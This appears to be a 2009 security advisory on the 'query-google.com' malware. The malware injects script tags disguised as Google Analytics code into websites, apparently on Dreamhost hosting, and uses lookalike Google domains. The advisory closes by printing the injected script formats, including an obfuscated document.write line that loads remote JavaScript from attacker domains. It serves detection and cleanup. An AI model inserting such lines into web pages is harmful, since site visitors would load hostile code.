query-google.com Malware

Updated: December 9, 2009

The query-google.com malware attempts to disguise itself by using domain names that include the word google and by making it look like it is part of Google Analytics code. The malware has used the domains query-google.com, google-query.com, and google-query.net. The domains go00ogle.net and go00ogle.com have the same registration information and appear to have been used as well. The current script for the malware looks similar to a legitimate piece of Google Analytics code and if there is Google Analytics code on the page the malware may be placed inside that.

This malware appears to only affect websites hosted by Dreamhost and it is most likely that its insertion into websites is due to a security vulnerability within Dreamhost's systems. We have been told that Dreamhost is denying that they have a security vulnerability that is causing the infection. Dreamhost previously acknowledged that a vulnerability in their systems lead to several thousand websites being infected with malware in June of 2007. If you are Dreamhost customer who has been infected, we would be interested to know what response you have received from Dreamhost about this issue and if you had scripts from any other domains added to your website.

Current Script Formats:
<script type="text/javascript" src="http://www.query-google.com/urchin.php"></script>

<script type="text/javascript">
document.write(unescape("%3Cscript src='http://www.google%2Dquery.com/ga.php' type='text/javascript'%3E%3C/script%3E"));